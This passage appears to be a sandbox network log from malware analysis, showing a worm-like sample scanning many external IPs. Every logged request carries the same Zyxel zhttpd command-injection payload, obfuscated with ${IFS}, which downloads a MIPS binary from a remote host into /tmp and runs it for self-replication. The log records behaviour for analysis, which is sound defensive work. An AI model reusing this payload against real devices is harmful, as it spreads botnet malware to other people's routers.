                                        Jan 14, 2024 16:18:55.704241037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7125192.168.2.1350590113.35.39.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704307079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7126192.168.2.134846058.3.73.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704345942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7127192.168.2.1343032177.98.179.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704400063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7128192.168.2.1334644120.161.69.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704452991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7129192.168.2.1337246212.194.191.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704504967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7130192.168.2.1348136125.141.143.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704530954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7131192.168.2.1344256175.85.137.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704587936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7132192.168.2.1348752170.89.189.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704634905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7133192.168.2.133774282.159.80.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704668045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7134192.168.2.1356008202.75.145.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704710960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7135192.168.2.1350948169.117.96.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704752922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7136192.168.2.134144096.237.20.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704804897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7137192.168.2.1356592123.20.124.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704838037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7138192.168.2.134914098.202.95.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704962015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7139192.168.2.1346520205.210.3.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704993010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7140192.168.2.133668461.255.130.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705024004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7141192.168.2.134999070.147.49.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705061913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7142192.168.2.1348352162.239.170.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705096006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7143192.168.2.135668824.23.151.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705122948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7144192.168.2.1337368209.145.196.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705162048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7145192.168.2.1353546201.231.153.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705207109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7146192.168.2.1349468141.59.120.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705248117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7147192.168.2.1352696168.136.211.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705287933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7148192.168.2.1356196130.167.55.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705338955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7149192.168.2.1355530141.62.58.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705400944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7150192.168.2.135013827.31.53.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705425024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7151192.168.2.135899881.124.146.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705465078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7152192.168.2.134291681.58.52.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705516100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7153192.168.2.133537084.128.138.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705544949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7154192.168.2.1352276153.48.20.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705600977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7155192.168.2.135267219.115.75.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705632925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7156192.168.2.1347936212.157.131.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705682039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7157192.168.2.1343056128.130.5.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705722094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7158192.168.2.1345402122.117.149.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705780029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7159192.168.2.13419041.40.163.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705811024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7160192.168.2.1344336161.210.179.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705857992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7161192.168.2.1358494201.144.132.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705902100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7162192.168.2.1336636204.18.139.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705952883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7163192.168.2.1337028165.76.201.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.705980062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7164192.168.2.135476088.203.146.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706027031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7165192.168.2.1349810198.111.152.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706060886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7166192.168.2.1335022151.100.190.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706099033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7167192.168.2.134657660.111.194.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706154108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7168192.168.2.1343626169.198.214.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706196070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7169192.168.2.1350686137.162.54.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706233978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7170192.168.2.134280612.152.18.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706260920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7171192.168.2.1350272143.3.41.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706326008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7172192.168.2.1349532219.91.144.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706360102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7173192.168.2.1349466116.40.38.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706429958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7174192.168.2.134110469.124.222.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706444979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7175192.168.2.1342670147.145.216.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706501961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7176192.168.2.1341578207.6.14.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706546068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7177192.168.2.1336442114.235.230.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706593037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7178192.168.2.1358240147.74.119.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706630945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7179192.168.2.133562050.19.201.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706675053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7180192.168.2.135699427.48.62.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706707954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7181192.168.2.1354144187.222.142.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706732035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7182192.168.2.1337198219.155.24.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706785917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7183192.168.2.134683853.26.114.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706813097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7184192.168.2.134397238.226.215.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706866980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7185192.168.2.1341226156.196.105.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706902981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7186192.168.2.1334574220.207.25.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.706960917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7187192.168.2.1335346191.91.63.162443
                                        TimestampBytes transferredDirectionData
